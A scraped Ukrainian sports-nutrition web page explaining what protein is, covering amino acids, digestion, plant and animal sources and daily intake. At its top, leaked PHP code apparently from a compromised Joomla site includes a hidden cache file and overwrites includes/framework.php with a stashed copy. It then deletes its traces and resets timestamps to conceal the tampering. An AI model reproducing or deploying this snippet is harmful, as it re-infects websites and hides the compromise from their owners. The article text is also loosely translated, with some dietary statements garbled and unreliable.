$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Що таке протеїн | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Що таке протеїн?

Протеїни (білки) - клас поживних речовин, що складаються з амінокислот - менших молекул, утворених з вуглецю, водню, кисню і атомів азоту. Ці атоми зв'язуються в різних комбінаціях, щоб утворити різні амінокислоти. Деякі з них є необхідними, тому що вони не можуть бути вироблені організмом і повинні бути прийняті разом з їжею. Інша частина їх може бути вироблена печінкою, якщо в організмі є всі необхідні хімічні компоненти. У протеїнів є безліч дуже важливих функцій в організмі.

Перш за все, білки відповідальні за ріст і підтримку всіх соматичних клітин і структур, як кістки, м'язи, клітини крові, шкіра і волосся. Білки - також первинний компонент ферментів, які допомагають полегшити багато хімічних реакцій в організмі, включаючи травлення. Протеїни також є невід'ємною частиною у виробництві таких гормонів як інсулін, гормонів щитовидної залози, естрогену і тестостерону. Коли ми їмо протеїни, шлунок виробляє травні кислоти, які починають процес руйнування його хімічної структури. Розщеплення білків триває у тонкій кишці, де, практично всі білки розщеплюються. В результаті білки повертаються назад до своєї основної структури - амінокислоти, і в такому вигляді вони можуть бути засвоєні організмом через кишечник і в кровообіг. Звідти, вони йдуть у печінку, де використання амінокислоти відрегульовано. Іноді вони використовуються, щоб синтезувати важливі протеїни в печінці, іноді їх посилають в інше місце для подальшого використання.

Протеїн в нашій дієті може надходити з двох різних джерел: рослинний протеїн (такий як соя, горіхи і боби), або тваринний протеїн (такі як м'ясо, молочні продукти і яйця). За винятком сої, тільки в тваринних білках містяться всі необхідні амінокислоти в достатній кількості, однак деякі з них можуть бути в недостатній кількості, щоб відповідати нашим дієтичним потребам.

Якщо Ви не їсте м'ясо-молочні продукти, Ви можете об'єднати різні типи білків, щоб гарантувати, що Ви отримаєте всі амінокислоти, в яких потребуєте. Потреба в білку відрізняється згідно з віком, статтю і вазі. Однак, для середньої жінки, у віці 19 - 50, споживання протеїну має скласти приблизно 46 - 50 г на день. Вагітна чи годує жінка потребує додаткового білку, щоб задовольнити їхні повсякденні потреби. Чоловіки мають потребу в більш високому кількості протеїну кожен день з-за більш високої маси м'язів, якою вони звичайно мають. Здорова дієта повинна включати 2 - 3 порції пісного білка щодня. Протеїни тваринного походження мають тенденцію бути більш насиченими жирами, тому вживання тваринних білків повинна бути обмежена. Пісні білки включають курчат і індичку, випечені або смажену без шкіри, яловичину з жиром, і рибу. Боби і горіхи - також хороші вибір серед білків рослинного походження. Досвід із зерновими, такими як лобода і каша, які містять надзвичайно велику кількість білка. Знежирені молочні продукти - також чудові джерела білка. Спробуйте знежирені йогурти, сир і молоко.

 
Спортивне харчування Що таке протеїн